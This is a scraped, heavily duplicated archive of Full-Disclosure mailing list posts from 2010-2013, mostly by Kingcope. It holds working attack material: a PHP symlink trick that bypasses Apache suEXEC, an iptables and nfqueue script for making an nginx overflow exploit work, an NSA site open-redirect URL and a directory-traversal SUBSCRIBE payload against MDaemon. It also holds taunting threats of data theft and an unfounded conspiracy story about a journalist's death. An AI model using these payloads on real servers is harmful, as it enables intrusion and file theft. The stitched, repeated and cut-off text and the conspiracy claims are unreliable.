Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
Uhh Hit em with a little Ghetto Gospel
So am i less holy Because i Puff a blunt and Drink a Beer with my homies?
Theres no Need for you to fear me if you Take your Time and Hear me Maybe you
can learn to cheer me.
It aint about Black and white cause we Human !!!
Lord can you Hear me speaaak!!
http://rapgenius.com/2pac-ghetto-gospel-lyrics
Am 09.08.2013 um 16:33 schrieb Kingcope
:
> So the blackhat that Sits on ur Site and the site of ur company Since half a
> year will stop at the point Where its "technically incorrect" and wont
> escalate to root because "it doesnt have to do Anything with suexec". Its an
> Old vuln so let it stay , better for us and soon our Data on your boxes.
>
> Time to Write a Real Root exploit and dont waste the Time with sysadmins that
> know how to set a flag in httpd.conf , apache devs included.
>
> Am 09.08.2013 um 14:29 schrieb Kingcope
> :
>
>> So what your Emails Tell me is better ignore this vulnerability. I dont
>> Claim its a High severity Bug but if you Tell People to ignore it Because it
>> isnt a vulnerability you are very much aiding the Chaos of insecurity in the
>> Internet today. You Maybe have a Secure Setting but theres only you on the
>> Planet. Attackers Look specifically for such Bugs to Open Servers. No Wonder
>> we have compromises in a High Scale every Day due to this ignorance. My rant
>> on that One.
>>
>> Am 07.08.2013 um 21:49 schrieb king cope
>> :
>>
>>> Apache suEXEC privilege elevation / information disclosure
>>>
>>> Discovered by Kingcope/Aug 2013
>>>
>>> The suEXEC feature provides Apache users the ability to run CGI and SSI
>>> programs
>>> under user IDs different from the user ID of the calling web server.
>>> Normally,
>>> when a CGI or SSI program executes, it runs as the same user who is running
>>> the
>>> web server.
>>> Used properly, this feature can reduce considerably the security risks
>>> involved
>>> with allowing users to develop and run private CGI or SSI programs.
>>>
>>> With this bug an attacker who is able to run php or cgi code inside a web
>>> hosting environment and the environment is configured to use suEXEC as a
>>> protection mechanism, he/she is able to read any file and directory on the
>>> file-
>>> system of the UNIX/Linux system with the user and group id of the
>>> apache web server.
>>>
>>> Normally php and cgi scripts are not allowed to read files with the apache
>>> user-
>>> id inside a suEXEC configured environment.
>>>
>>> Take for example this apache owned file and the php script that follows.
>>>
>>> $ ls -la /etc/testapache
>>> -rw--- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache
>>> only user www-data should be able to read this file.
>>>
>>> $ cat test.php
>>> >> system("id; cat /etc/testapache");
>>> ?>
>>>
>>> When calling the php file using a webbrowser it will show...
>>> uid=1002(example) gid=1002(example) groups=1002(example)
>>>
>>> because the php script is run trough suEXEC.
>>> The script will not output the file requested because of a permissions
>>> error.
>>>
>>> Now if we create a .htaccess file with the content...
>>> Options Indexes FollowSymLinks
>>>
>>> and a php script with the content...
>>>
>>> >> system("ln -sf / test99.php");
>>> symlink("/", "test99.php"); // try builtin function in case when
>>> //system() is blocked
>>> ?>
>>> in the same folder
>>>
>>> ..we can access the root filesystem with the apache uid,gid by
>>> requesting test99.php.
>>> The above php script will simply create a symbolic link to '/'.
>>>
>>> A request to test99.php/etc/testapache done with a web browser shows..
>>> voila! read with the apache uid/gid
>>>
>>> The reason we can now read out any files and traverse directories owned by
>>> the
>>> apache user is because apache httpd displays symlinks and directory listings
>>> without querying suEXEC.
>>> It is not possible to write to files in this case.
>>>
>>> Version notes. Assumed is that all Apache versions are affected by this bug.
>>>
>>> apache2 -V
>>> Server version: Apache/2.2.22 (Debian)
>>> Server built: Mar 4 2013
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
Uhh Hit em with a little Ghetto Gospel
So am i less holy Because i Puff a blunt and Drink a Beer with my homies?
Theres no Need for you to fear me if you Take your Time and Hear me Maybe you
can learn to cheer me.
It aint about Black and white cause we Human !!!
Lord can you Hear me speaaak!!
http://rapgenius.com/2pac-ghetto-gospel-lyrics
Am 09.08.2013 um 16:33 schrieb Kingcope
:
> So the blackhat that Sits on ur Site and the site of ur company Since half a
> year will stop at the point Where its "technically incorrect" and wont
> escalate to root because "it doesnt have to do Anything with suexec". Its an
> Old vuln so let it stay , better for us and soon our Data on your boxes.
>
> Time to Write a Real Root exploit and dont waste the Time with sysadmins that
> know how to set a flag in httpd.conf , apache devs included.
>
> Am 09.08.2013 um 14:29 schrieb Kingcope
> :
>
>> So what your Emails Tell me is better ignore this vulnerability. I dont
>> Claim its a High severity Bug but if you Tell People to ignore it Because it
>> isnt a vulnerability you are very much aiding the Chaos of insecurity in the
>> Internet today. You Maybe have a Secure Setting but theres only you on the
>> Planet. Attackers Look specifically for such Bugs to Open Servers. No Wonder
>> we have compromises in a High Scale every Day due to this ignorance. My rant
>> on that One.
>>
>> Am 07.08.2013 um 21:49 schrieb king cope
>> :
>>
>>> Apache suEXEC privilege elevation / information disclosure
>>>
>>> Discovered by Kingcope/Aug 2013
>>>
>>> The suEXEC feature provides Apache users the ability to run CGI and SSI
>>> programs
>>> under user IDs different from the user ID of the calling web server.
>>> Normally,
>>> when a CGI or SSI program executes, it runs as the same user who is running
>>> the
>>> web server.
>>> Used properly, this feature can reduce considerably the security risks
>>> involved
>>> with allowing users to develop and run private CGI or SSI programs.
>>>
>>> With this bug an attacker who is able to run php or cgi code inside a web
>>> hosting environment and the environment is configured to use suEXEC as a
>>> protection mechanism, he/she is able to read any file and directory on the
>>> file-
>>> system of the UNIX/Linux system with the user and group id of the
>>> apache web server.
>>>
>>> Normally php and cgi scripts are not allowed to read files with the apache
>>> user-
>>> id inside a suEXEC configured environment.
>>>
>>> Take for example this apache owned file and the php script that follows.
>>>
>>> $ ls -la /etc/testapache
>>> -rw--- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache
>>> only user www-data should be able to read this file.
>>>
>>> $ cat test.php
>>> >> system("id; cat /etc/testapache");
>>> ?>
>>>
>>> When calling the php file using a webbrowser it will show...
>>> uid=1002(example) gid=1002(example) groups=1002(example)
>>>
>>> because the php script is run trough suEXEC.
>>> The script will not output the file requested because of a permissions
>>> error.
>>>
>>> Now if we create a .htaccess file with the content...
>>> Options Indexes FollowSymLinks
>>>
>>> and a php script with the content...
>>>
>>> >> system("ln -sf / test99.php");
>>> symlink("/", "test99.php"); // try builtin function in case when
>>> //system() is blocked
>>> ?>
>>> in the same folder
>>>
>>> ..we can access the root filesystem with the apache uid,gid by
>>> requesting test99.php.
>>> The above php script will simply create a symbolic link to '/'.
>>>
>>> A request to test99.php/etc/testapache done with a web browser shows..
>>> voila! read with the apache uid/gid
>>>
>>> The reason we can now read out any files and traverse directories owned by
>>> the
>>> apache user is because apache httpd displays symlinks and directory listings
>>> without querying suEXEC.
>>> It is not possible to write to files in this case.
>>>
>>> Version notes. Assumed is that all Apache versions are affected by this bug.
>>>
>>> apache2 -V
>>> Server version: Apache/2.2.22 (Debian)
>>> Server built: Mar 4 2013
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
So the blackhat that Sits on ur Site and the site of ur company Since half a
year will stop at the point Where its "technically incorrect" and wont
escalate to root because "it doesnt have to do Anything with suexec". Its an
Old vuln so let it stay , better for us and soon our Data on your boxes.
Time to Write a Real Root exploit and dont waste the Time with sysadmins that
know how to set a flag in httpd.conf , apache devs included.
Am 09.08.2013 um 14:29 schrieb Kingcope
:
> So what your Emails Tell me is better ignore this vulnerability. I dont Claim
> its a High severity Bug but if you Tell People to ignore it Because it isnt a
> vulnerability you are very much aiding the Chaos of insecurity in the
> Internet today. You Maybe have a Secure Setting but theres only you on the
> Planet. Attackers Look specifically for such Bugs to Open Servers. No Wonder
> we have compromises in a High Scale every Day due to this ignorance. My rant
> on that One.
>
> Am 07.08.2013 um 21:49 schrieb king cope
> :
>
>> Apache suEXEC privilege elevation / information disclosure
>>
>> Discovered by Kingcope/Aug 2013
>>
>> The suEXEC feature provides Apache users the ability to run CGI and SSI
>> programs
>> under user IDs different from the user ID of the calling web server.
>> Normally,
>> when a CGI or SSI program executes, it runs as the same user who is running
>> the
>> web server.
>> Used properly, this feature can reduce considerably the security risks
>> involved
>> with allowing users to develop and run private CGI or SSI programs.
>>
>> With this bug an attacker who is able to run php or cgi code inside a web
>> hosting environment and the environment is configured to use suEXEC as a
>> protection mechanism, he/she is able to read any file and directory on the
>> file-
>> system of the UNIX/Linux system with the user and group id of the
>> apache web server.
>>
>> Normally php and cgi scripts are not allowed to read files with the apache
>> user-
>> id inside a suEXEC configured environment.
>>
>> Take for example this apache owned file and the php script that follows.
>>
>> $ ls -la /etc/testapache
>> -rw--- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache
>> only user www-data should be able to read this file.
>>
>> $ cat test.php
>> > system("id; cat /etc/testapache");
>> ?>
>>
>> When calling the php file using a webbrowser it will show...
>> uid=1002(example) gid=1002(example) groups=1002(example)
>>
>> because the php script is run trough suEXEC.
>> The script will not output the file requested because of a permissions error.
>>
>> Now if we create a .htaccess file with the content...
>> Options Indexes FollowSymLinks
>>
>> and a php script with the content...
>>
>> > system("ln -sf / test99.php");
>> symlink("/", "test99.php"); // try builtin function in case when
>> //system() is blocked
>> ?>
>> in the same folder
>>
>> ..we can access the root filesystem with the apache uid,gid by
>> requesting test99.php.
>> The above php script will simply create a symbolic link to '/'.
>>
>> A request to test99.php/etc/testapache done with a web browser shows..
>> voila! read with the apache uid/gid
>>
>> The reason we can now read out any files and traverse directories owned by
>> the
>> apache user is because apache httpd displays symlinks and directory listings
>> without querying suEXEC.
>> It is not possible to write to files in this case.
>>
>> Version notes. Assumed is that all Apache versions are affected by this bug.
>>
>> apache2 -V
>> Server version: Apache/2.2.22 (Debian)
>> Server built: Mar 4 2013 21:32:32
>> Server's Module Magic Number: 20051115:30
>> Server loaded: APR 1.4.6, APR-Util 1.4.1
>> Compiled using: APR 1.4.6, APR-Util 1.4.1
>> Architecture: 32-bit
>> Server MPM: Worker
>> threaded: yes (fixed thread count)
>> forked: yes (variable process count)
>> Server compiled with
>> -D APACHE_MPM_DIR="server/mpm/worker"
>> -D APR_HAS_SENDFILE
>> -D APR_HAS_MMAP
>> -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
>> -D APR_USE_SYSVSEM_SERIALIZE
>> -D APR_USE_PTHREAD_SERIALIZE
>> -D APR_HAS_OTHER_CHILD
>> -D AP_HAVE_RELIABLE_PIPED_LOGS
>> -D DYNAMIC_MODULE_LIMIT=128
>> -D HTTPD_ROOT="/etc/apache2"
>> -D SUEXEC_BIN="/usr/lib/apache2/suexec"
>> -D DEFAULT_PIDLOG="/var/run/apache2.pid"
>> -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
>> -D DEFAULT_ERRORLOG="logs/error_log"
>> -D AP_TYPES_CONFIG_FILE="mime.types"
>> -D SERVER_CONFIG_FILE="apache2.conf"
>>
>> Cheers,
>> /Kingcope
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
So what your Emails Tell me is better ignore this vulnerability. I dont Claim
its a High severity Bug but if you Tell People to ignore it Because it isnt a
vulnerability you are very much aiding the Chaos of insecurity in the Internet
today. You Maybe have a Secure Setting but theres only you on the Planet.
Attackers Look specifically for such Bugs to Open Servers. No Wonder we have
compromises in a High Scale every Day due to this ignorance. My rant on that
One.
Am 07.08.2013 um 21:49 schrieb king cope
:
> Apache suEXEC privilege elevation / information disclosure
>
> Discovered by Kingcope/Aug 2013
>
> The suEXEC feature provides Apache users the ability to run CGI and SSI
> programs
> under user IDs different from the user ID of the calling web server. Normally,
> when a CGI or SSI program executes, it runs as the same user who is running
> the
> web server.
> Used properly, this feature can reduce considerably the security risks
> involved
> with allowing users to develop and run private CGI or SSI programs.
>
> With this bug an attacker who is able to run php or cgi code inside a web
> hosting environment and the environment is configured to use suEXEC as a
> protection mechanism, he/she is able to read any file and directory on the
> file-
> system of the UNIX/Linux system with the user and group id of the
> apache web server.
>
> Normally php and cgi scripts are not allowed to read files with the apache
> user-
> id inside a suEXEC configured environment.
>
> Take for example this apache owned file and the php script that follows.
>
> $ ls -la /etc/testapache
> -rw--- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache
> only user www-data should be able to read this file.
>
> $ cat test.php
> system("id; cat /etc/testapache");
> ?>
>
> When calling the php file using a webbrowser it will show...
> uid=1002(example) gid=1002(example) groups=1002(example)
>
> because the php script is run trough suEXEC.
> The script will not output the file requested because of a permissions error.
>
> Now if we create a .htaccess file with the content...
> Options Indexes FollowSymLinks
>
> and a php script with the content...
>
> system("ln -sf / test99.php");
>symlink("/", "test99.php"); // try builtin function in case when
>//system() is blocked
> ?>
> in the same folder
>
> ..we can access the root filesystem with the apache uid,gid by
> requesting test99.php.
> The above php script will simply create a symbolic link to '/'.
>
> A request to test99.php/etc/testapache done with a web browser shows..
> voila! read with the apache uid/gid
>
> The reason we can now read out any files and traverse directories owned by the
> apache user is because apache httpd displays symlinks and directory listings
> without querying suEXEC.
> It is not possible to write to files in this case.
>
> Version notes. Assumed is that all Apache versions are affected by this bug.
>
> apache2 -V
> Server version: Apache/2.2.22 (Debian)
> Server built: Mar 4 2013 21:32:32
> Server's Module Magic Number: 20051115:30
> Server loaded: APR 1.4.6, APR-Util 1.4.1
> Compiled using: APR 1.4.6, APR-Util 1.4.1
> Architecture: 32-bit
> Server MPM: Worker
> threaded: yes (fixed thread count)
>forked: yes (variable process count)
> Server compiled with
> -D APACHE_MPM_DIR="server/mpm/worker"
> -D APR_HAS_SENDFILE
> -D APR_HAS_MMAP
> -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
> -D APR_USE_SYSVSEM_SERIALIZE
> -D APR_USE_PTHREAD_SERIALIZE
> -D APR_HAS_OTHER_CHILD
> -D AP_HAVE_RELIABLE_PIPED_LOGS
> -D DYNAMIC_MODULE_LIMIT=128
> -D HTTPD_ROOT="/etc/apache2"
> -D SUEXEC_BIN="/usr/lib/apache2/suexec"
> -D DEFAULT_PIDLOG="/var/run/apache2.pid"
> -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
> -D DEFAULT_ERRORLOG="logs/error_log"
> -D AP_TYPES_CONFIG_FILE="mime.types"
> -D SERVER_CONFIG_FILE="apache2.conf"
>
> Cheers,
> /Kingcope
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] nginx exploit documentation, about a generic way to exploit Linux targets
Thanks for the hint about how to solve the issue! Two questions. Is the combination of both the iptables setting and python script a standalone solution along with the exploit code or is it required to send the exploit buffers in nfq.py? I assume the first. Does this configuration require anything else? I tested it using a vm inside windows but I presume it needs a real independent Linux host on the Internet right? Greetings, Kcope Am 24.07.2013 um 17:13 schrieb Albert Puigsech Galicia : > Hello everybody, > > >> "Ioctl is needed to set the nginx socket blocking so another call to >> write(2) will read much more memory than it is possible with the default >> non-blocking connection of nginx." > > > This vulnerability was published recently and it seems that many > exploiters got stuck because the socket will not block because the > buffer is longer than the standard ethernet MTU, some others have > found another attack vector without that problem. > > Let me to explain how we have achieved to overcome the non-blocking > socket impediment without doing so much: > > > When packets arriving at the TCP layer are analyzed and once > determined the sequence are immediately delivered to the upper layer > of the OSI model. > > Let's imagine that you want to overflow a big buffer through the > network. Normally you would execute something like; > > send(sock, "A….A",…); > > If the size of the data is bigger than the MTU, is then splitted into > multiple packages. The destination processes the information on many > smaller packages instead of one. In summary,the read()/recv() doesn't > get all the data and the overflow is not done. > > And that's what's happening on ngingx. > > > > What we have done to prevent that packets are delivered directly to > the next layer is taking profit of TCP windows and TCP reorder: > sending the first package on the last place. > > What happens is that the TCP stack will not deliver the packets to the > next layer because the information is not complete, and just wait > until all information (up to the size of the tcp window) is received > to deliver it. > > Then the application layer will get all the information in _the same_ > read an the overflow will happen. > > > > Using that TCP trick, the size limitation of the overflow is the TCP > window size instead the MTU. > > > > One easy and **dirty** way to implement this is using iptables and > nfqueue, but there are some better ones: > > # iptables -A OUTPUT -p tcp -d --destination-port -j NFQUEUE > # python nfq.py > > Regards, > > > > ===/ nfq.py /=== > import nfqueue > import socket > import time > > data_count = 0 > delayed = None > > def cb(dummy, payload): >global data_count >global delayed >data = payload.get_data() > # DIRTY for first data package (not three-way-handshake) >if len(data) > 60: >data_count += 1 >if (data_count == 1): >delayed = payload >print data > # Just DROP the packet and the local TCP stack will send it again > because won't get the ACK. >payload.set_verdict(nfqueue.NF_DROP) >else: >data_count = 0 > > > q = nfqueue.queue() > q.open() > q.bind(socket.AF_INET) > q.set_callback(cb) > q.create_queue(0) > try: >q.try_run() > except KeyboardInterrupt: >print "Exiting..." > q.unbind(socket.AF_INET) > q.close() > ===/ nfq.py /=== > > On 23 July 2013 19:49, king cope > wrote: >> (see attachment) >> >> /Kingcope >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > -- > Albert Puigsech Galicia > + Mail: alb...@puigsech.com > + Jabber: alb...@puigsech.com > + Twitter: @apuigsech > + Web: file:///dev/null ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Multiple vulnerabilities found in NSA website
The US is spying on us .. Huh? Why didn't you tell us before ! http://www.youtube.com/watch?v=8JCVucx5HzI Greetz: jimjones, matt, scut of teso:)) Kcrookie Am 29.06.2013 um 23:05 schrieb macf...@chronicle.su: > RUSTLE LEAGUE WHITE HAT SECURITY RESEARCH TEAM REVEALS HOLE IN NSA WEBSITE; > CONTACTS VENDOR, HOLE PATCHED. > > RUSTLE RESEARCH ETHICAL R&D WHITEHAT RED TEAM > VULNERABILITY ALERT AND ASSESSMENT > RED TEAM ALERT LEVEL AT MAGENTA > > ETHICAL DISCLOSURE NOTICE: Press release withheld until holes were patched. > > Breaking: NSA Website Vulnerable To Attack via Third Party Software, > Illustrate Dangers of Security Outsourcing > Ethical Hackers Exploit XSS Vulnerabilities in NSA Software Made by third > party. > > Field researchers curiously perusing nsa.gov stumbled upon XSS > vulnerabilities on the main NSA forward facing webserver. Both > vulnerabilities were found in shoddily outsourced third party software > written in Coldfusion--which we all know is the worlds greatest mark-up > language. > > "Anyone with an internet connection can use the XSS vulnerability to > impersonate NSA personnel and web traffic," says Horace Grant, a researcher > with Rustle Research. "Why are unreliable third parties creating the software > that guards our national secrets?" > > These exploits are ironic given the multiple, recently revealed NSA security > faux pas. The obvious Booz Allen Hamilton/NSA partnership allowed CIA > operative and possible Communist spy, Edward Snowden, to infiltrate the NSA > and leak the PRISM slides. Hilarious outsourcing of basic webapps to ma'n'pa > crapshoot ColdFusion developers have now given an even graver look at the > egregious outsourcing of even the most minute government projects. > > Why the focus on ColdFusion? The Adobe product is made by a company well > known for holding a monopoly on online media. A simple google query, such as > "michael hastings adobe" yields many results, all requiring Adobe products to > view. Recently deceased, journalist Michael Hastings was researching > government secrets. Many say he was investigating not only the NSA, but > Wikileaks FBI informant Sigurdur Thordarson, who has close ties with the > Democratic People's Republic of Korea. Rumors say Hastings' car was hacked by > a 0day ColdFusion exploit, sending him to his fiery grave. Anyone in the know > realizes that Siggi was the one who sent FBI assassins after Hastings, who > was also researching Adrian Lamo and th3j35t3r. > > One of the NSA vulnerabilities exploited by ethical white hat hackers this > week exists in the "Careers" section of the nsa.gov website. Internet users > who enter data into the "Feedback" fields now are treated to a jovial visual > representation of their data pooped back at them, in such elegant fashion as: > http://i.imgur.com/1cyISex.png > > The other, more insidious, yet still trivial bug in nsa.gov, is an XSS attack > that allows URL redirection. When the "Mail to a Friend" notice is queried, > and nsa.gov is appended at the end of the address. It is then exempted and > allowed to redirect to the provided address. For example: > http://www.nsa.gov/applications/links/notices.cfm?address=http://wikipaste.eu/nsa.gov > > Other possible uses of these exploits include dropping a malicious website > into the url by using simple disguising methods, redirect, and executing > arbitrary code. An attacker could also pretend to be an NSA employee and send > a malicious payload via email to real NSA employees, unbeknownst to them -- > or simply trick more people into seeing goatse because that shit's funny as > fuck. > > The holes have since been patched. > > http://rustleleague.com/advisory.html > > greetz: adobe, YAN, jimjones, chippy, zeekilled > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Newbie] How to search in all full-disclos...@lists.grok.org.uk
> http://marc.info/?l=full-disclosure&r=1&w=2 > Welcome > > Am 21.06.2013 um 18:54 schrieb Jeffrey Walton : > >> On Fri, Jun 21, 2013 at 10:38 AM, JOSE DAMICO wrote: >>> Hi, >>> >>> Is there a way to make full search by keyword in all >>> full-disclosure@lists.grok.org.uk archive of messages? >> In Google: >> >> site:seclists.org/fulldisclosure >> >> Jeff >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plesk Apache Zeroday Remote Exploit
Ena sokaki me kratai salionikotiko.. Ela ena bradi tin iposxesi na paris .. prin na tin sbisi me sboungari o barbaris .. Lipi to blema sou ap tis avgis ta xromata!!! Lipi to oniro .. Esi ! Kai to DOKSARI!! Am 06.06.2013 um 04:28 schrieb Kingcope : > Dave , > Again bla bla, > Dont Lie!!! I tested and it Works proper !! Tested on Centos Red Hat Debian > FreeBSD !! Pure Remote in the Wild !! Better Patch Ur Servers and Check Ur > perimeter than Telling lies. > > Me mixanaki Kai Computer Kai flogera! > > Cheerio, > > Kctherookie > > Am 06.06.2013 um 00:37 schrieb David H : > >> Sorry for improper reply; was not a member of the list until today so I >> didn't have the original email to reply to. >> >> As best I can tell, this exploit only works on very specific configurations >> that may or may not actually be related to Plesk; I'm not able to tell >> because I have not found a version of Plesk that the vulnerability worked on >> to be able to determine why. I was only able to reproduce this issue on one >> server and it turns out there was a very weird reason why it worked. >> >> The server in question was Plesk 8.6 on CentOS 5. On that particular >> server, the exploit only worked on IP addresses that were set to 'shared' in >> Plesk, it did not work on any IP set to exclusive that had a default website >> configured to be served. >> >> Additionally, there was no reference to phppath in any of the apache config >> files on the system in /etc/httpd/conf/, /etc/httpd/conf.d/, or >> /var/www/vhosts/*/conf/ where all the included domain config files are so I >> was really struggling to figure out why that was working. >> >> Turns out on this specific server the server owner had an issue where some >> of his hosted domain owners liked to type in https:// in front of their >> domain even if they did not use SSL and were on the shared IP address. >> Normally, by default for Plesk, if a site on a shared IP does not have SSL >> enabled, you'll get the Plesk banner page instead of the website you typed >> in, which is served from /var/www/vhosts/default/htdocs/. This customer had >> some complaints from those users, so he put a copy of /usr/bin/php-cgi in >> /var/www/vhosts/default/cgi-bin/, used a .htaccess to enable php for those >> default requests, then rewrote all requests coming in over https:// to >> index.php where a redirect was done in php to the non-secure equivalent of >> the domain requested. (Just using rewrite rules would have worked too but >> whatever...) >> >> It appears this was set up a couple years ago and since this was CentOS 5, >> the copy of /usr/bin/php-cgi taken at the time was vulnerable to the >> cve-2012-1823 issue. Copying /usr/bin/php-cgi over top of >> /var/www/vhosts/default/cgi-bin/php-cgi resolved the issue. If this was not >> related to cve-2012-1823 I would not have expected that solution to work, >> since the only change was copying the latest CentOS 5 php-cgi over top of a >> several year old version of the same file. Additionally, prior to doing >> that, I modified the exploit script to execute 'ls' and got the contents of >> the /var/www/vhosts/default/htdocs/ directory. Based on the description of >> the exploit and the expectation that it is running by using a direct >> execution of /usr/bin/php, I would have expected to get the contents of >> /usr/bin/ instead? >> >> Now, keep in mind that Plesk 8 did not allow you to select to select to run >> php as a fastcgi or cgi, only php on or php off. I'm only familiar with >> Plesk on CentOS but this means that without a custom config, there is no way >> to run a website on an install of Plesk 8 on CentOS with php set to run as a >> cgi, only apache module, and the exploit doesn't seem to work in that case. >> >> Plesk 9 did add the option to run php as fastcgi or cgi. After some >> searching around online, I did find reference to the 'phppath' alias in some >> Plesk forum posts but they were for platforms other than CentOS and not >> Plesk 8, so unless I'm missing it, I don't think the ScriptAlias /phppath/ >> is used on Plesk 8 or 9 on CentOS with the CentOS-provided php. >> >> I know my situation was very weird, so I'm just theorizing now, but I'm kind >> of thinking at this point that perhaps the exploit only works in the >> following specific situations: >> >> 1) If the server in question runs an OS where php executes as a cgi by >> default instead of as an apac
Re: [Full-disclosure] XSS in www.paypal.com
Yours! Am 05.06.2013 um 19:24 schrieb Ryan Dewhurst : > Which user cookies can you steal? > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plesk Apache Zeroday Remote Exploit
hed for > cve-2012-1823. > > In CentOS/RHEL, if you install httpd and mod_php, the default config is to > run it as an apache module and this exploit did not work in those situations; > same with Plesk 9. I also attempted to set php to run as a cgi on a few > sites on Plesk 9 on CentOS 5 and the exploit did not work, but all of the > CentOS 5 servers I have access to have their php rpm up to date which means > it is patched for cve-2012-1823. CentOS 4 was never php 5 so it was not > vulnerable to cve-2012-1823 to begin with and Plesk 8 and Plesk 9 on that > platform don't seem to be vulnerable. > > If someone has an out of date copy of CentOS 5 running Plesk 9, it would be > interesting to set a site to run php as a cgi and then hit it with the script > to see if the exploit works. If it does, then it's the cve-2012-1823 issue > and just unpatched servers causing the problem, but only when the exploit > hits a website that has php set to run as a cgi, or the OS runs it as a cgi > by default (don't know which ones do that). > > Dave > > > > From: king cope > Date: Wed, 5 Jun 2013 18:37:38 +0200 > Please keep headers intact. > > Engineered by Kingcope > > Copyright (C)2013 Kingcope > Attachment: pleskwwwzeroday.rar > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plesk Apache Zeroday Remote Exploit
this exploit did not work in those situations; > same with Plesk 9. I also attempted to set php to run as a cgi on a few > sites on Plesk 9 on CentOS 5 and the exploit did not work, but all of the > CentOS 5 servers I have access to have their php rpm up to date which means > it is patched for cve-2012-1823. CentOS 4 was never php 5 so it was not > vulnerable to cve-2012-1823 to begin with and Plesk 8 and Plesk 9 on that > platform don't seem to be vulnerable. > > If someone has an out of date copy of CentOS 5 running Plesk 9, it would be > interesting to set a site to run php as a cgi and then hit it with the script > to see if the exploit works. If it does, then it's the cve-2012-1823 issue > and just unpatched servers causing the problem, but only when the exploit > hits a website that has php set to run as a cgi, or the OS runs it as a cgi > by default (don't know which ones do that). > > Dave > > > > From: king cope > Date: Wed, 5 Jun 2013 18:37:38 +0200 > Please keep headers intact. > > Engineered by Kingcope > > Copyright (C)2013 Kingcope > Attachment: pleskwwwzeroday.rar > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MDaemon Mailer Daemon Version 11.0.1 (LATEST) Remote File Disclosure
MDaemon Mailer Daemon Version 11.0.1 (LATEST) Remote File Disclosure
Bug Found & Exploited by Kingcope
May 2010
The latest version at the time of this advisory is vulnerble to the attack.
It seems all files which the SYSTEM account can read can be accessed remotely,
even accessing files on SMB shares located in the local network might
be possible.
The caveat is that only human readable files can be read.
This bug is complex so let's break the attack down into it's different pieces.
Mailing list support in MDaemon
---
MDaemon support mailing list. When a mailing list is configured, people can
subscribe and use the mailing list commands which are sent to
MDaemon@.
The MDaemon Software stores configurations for mailing lists inside a
file with the grp extension
which is located in (normally C:\MDaemon)\App so for
example in C:\MDaemon\App.
A mailing list group file can look like the following (only a snippet
of the file):
---snip---
# Mailing List file
#
; ListName = t...@company.mail
; Private = N
; HideFromAddressBook = N
; AllowExpn = Y
; ListNameInSubject = Y
...
---snip---
grp file
--
Inside the grp file there is a setting for a welcome message which is
sent when a user subscribes to
a mailing list.
The field is named "WelcomeFile", for example this setting can be:
; WelcomeFile = C:\autoexec.bat
Directory traversal in SUBSCRIBE (and other commands, SUBSCRIBE is the
important for the attack)
--
When subscribing to a mailing list the user sends an E-Mail with a subject like:
SUBSCRIBE test-mailinglist@
In this case a grp file named test-mailingl...@domain.grp will be
searched for in C:\MDaemon\App\.
An attacker can now supply dot dot slashes here to point to a
different file as intended, for example:
SUBSCRIBE
VVV@"../../../../../../../../../../../../../../../../../users/kcope/openshare/foobar
In this case the Mailer Daemon will look for the grp file in the
location C:\Users\Kcope\OpenShare\foobar.grp.
If the file exists MDaemon will use this file and send back a
confirmation E-Mail because of a mailing list subscription.
The attack does not depend on a mailing list being configured but on a
file which the user controls under a C: folder (which
he for example uploaded through SMB or FTP). So this is the only
migitation for the attack. I did not find a way to
discard the grp file extension added to the requested file, so it's
not possible to reuse sent mails by the attacker
for example.
Welcome message file and final attack
--
As seen before the grp file supports a welcome message file setting.
When the user responds to the malicious
subscription request sent by him (it's important to change the domain
name at this point to the correct one, because
MDaemon gets confused by the ../ domainname seen above when sending
the confirmation mail) he will gracefully receive
the requested file which was set in grp file back as an email
contained in a welcome E-Mail by MDaemon.
Exploit PoC
--
The following exploit will force the welcome file set in
c:/users/kcope/openshare/foobar.grp to be sent to the attacker
after confirming the subscription request.
---snip---
use IO::Socket::INET;
